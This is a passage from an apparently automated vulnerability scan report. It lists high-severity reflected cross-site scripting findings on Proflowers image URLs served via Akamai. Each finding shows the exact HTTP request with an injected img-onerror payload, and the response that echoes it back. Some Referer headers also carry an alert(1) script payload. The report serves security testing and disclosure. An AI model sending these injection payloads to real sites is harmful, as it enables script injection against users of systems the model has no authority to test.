GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img%20src%3da%20onerror%3dalert(1)>47859c8e565?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF30a26<img src=a onerror=alert(1)>47859c8e565

4.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b was submitted in the REST URL parameter 9. This input was echoed as 1a7b7<img src=a onerror=alert(1)>259093f2a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img%20src%3da%20onerror%3dalert(1)>259093f2a2b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:02 GMT
Connection: close

Unable to find /ProvideCommerce/MBQgardenbouquet_grn11_PF1a7b7<img src=a onerror=alert(1)>259093f2a2b

4.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225 was submitted in the REST URL parameter 9. This input was echoed as 3114b<img src=a onerror=alert(1)>5b9724d6225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img%20src%3da%20onerror%3dalert(1)>5b9724d6225?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:53 GMT
Connection: close

Unable to find /ProvideCommerce/MBQhugskisses_rbye11_PF3114b<img src=a onerror=alert(1)>5b9724d6225

4.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad was submitted in the REST URL parameter 9. This input was echoed as 3134b<img src=a onerror=alert(1)>0eff80005ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img%20src%3da%20onerror%3dalert(1)>0eff80005ad?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQjoyfulbouquet_pnk10_PF3134b<img src=a onerror=alert(1)>0eff80005ad

4.60. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload cb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065 was submitted in the REST URL parameter 9. This input was echoed as cb531<img src=a onerror=alert(1)>8866ce5e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img%20src%3da%20onerror%3dalert(1)>8866ce5e065?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/MBQnewspringdays_grn10_3_PFcb531<img src=a onerror=alert(1)>8866ce5e065

4.61. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7 was submitted in the REST URL parameter 9. This input was echoed as ade22<img src=a onerror=alert(1)>04c4d155f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img%20src%3da%20onerror%3dalert(1)>04c4d155f7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:52 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpinksapp_pnk11_catalog_PFade22<img src=a onerror=alert(1)>04c4d155f7

4.62. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081 was submitted in the REST URL parameter 9. This input was echoed as b8d1e<img src=a onerror=alert(1)>b9b63706081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img%20src%3da%20onerror%3dalert(1)>b9b63706081?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurelyspec_grn10_PFb8d1e<img src=a onerror=alert(1)>b9b63706081

4.63. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4 was submitted in the REST URL parameter 9. This input was echoed as f576b<img src=a onerror=alert(1)>318adb917f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQpurppetals11_PFf576b<img%20src%3da%20onerror%3dalert(1)>318adb917f4?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:56 GMT
Connection: close

Unable to find /ProvideCommerce/MBQpurppetals11_PFf576b<img src=a onerror=alert(1)>318adb917f4

4.64. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263 was submitted in the REST URL parameter 9. This input was echoed as 14c82<img src=a onerror=alert(1)>a650ceee263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img%20src%3da%20onerror%3dalert(1)>a650ceee263?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:50 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF14c82<img src=a onerror=alert(1)>a650ceee263

4.65. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c was submitted in the REST URL parameter 9. This input was echoed as eb360<img src=a onerror=alert(1)>050e392a88c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringcarnspoms11_PFeb360<img%20src%3da%20onerror%3dalert(1)>050e392a88c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 99
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:46 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringcarnspoms11_PFeb360<img src=a onerror=alert(1)>050e392a88c

4.66. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96 was submitted in the REST URL parameter 9. This input was echoed as f398f<img src=a onerror=alert(1)>7798ed45d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringmix11_PFf398f<img%20src%3da%20onerror%3dalert(1)>7798ed45d96?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/MBQspringmix11_PFf398f<img src=a onerror=alert(1)>7798ed45d96

4.67. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173 was submitted in the REST URL parameter 9. This input was echoed as c3445<img src=a onerror=alert(1)>a12c7cc1173 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQsprngawake09_PFc3445<img%20src%3da%20onerror%3dalert(1)>a12c7cc1173?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:57 GMT
Connection: close

Unable to find /ProvideCommerce/MBQsprngawake09_PFc3445<img src=a onerror=alert(1)>a12c7cc1173

4.68. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca was submitted in the REST URL parameter 9. This input was echoed as b01c9<img src=a onerror=alert(1)>1b6363653ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img%20src%3da%20onerror%3dalert(1)>1b6363653ca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:42 GMT
Connection: close

Unable to find /ProvideCommerce/MBQtruspec_pnk10_3_PFb01c9<img src=a onerror=alert(1)>1b6363653ca

4.69. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3 was submitted in the REST URL parameter 9. This input was echoed as c1d42<img src=a onerror=alert(1)>8f4a450e5b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img%20src%3da%20onerror%3dalert(1)>8f4a450e5b3?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:14 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQc1d42<img src=a onerror=alert(1)>8f4a450e5b3

4.70. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload afe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2 was submitted in the REST URL parameter 9. This input was echoed as afe11<img src=a onerror=alert(1)>38946d8b0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img%20src%3da%20onerror%3dalert(1)>38946d8b0c2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:11 GMT
Connection: close

Unable to find /ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQafe11<img src=a onerror=alert(1)>38946d8b0c2

4.71. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36 was submitted in the REST URL parameter 9. This input was echoed as e5c08<img src=a onerror=alert(1)>f66d8f8ae36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_ACe5c08<img%20src%3da%20onerror%3dalert(1)>f66d8f8ae36?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:12:34 GMT
Connection: close

Unable to find /ProvideCommerce/Mdaycard10_ACe5c08<img src=a onerror=alert(1)>f66d8f8ae36

4.72. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
